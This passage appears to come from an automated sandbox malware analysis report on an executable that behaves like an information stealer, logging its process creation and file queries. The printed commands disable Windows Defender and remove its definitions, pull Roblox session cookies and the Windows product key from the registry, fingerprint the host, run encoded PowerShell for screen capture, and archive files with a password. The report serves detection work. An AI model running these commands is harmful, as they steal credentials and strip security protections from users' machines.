GQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,70_2_00007FF6AA1CB340
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA795E0 cpuid 0_2_00007FF78DA795E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
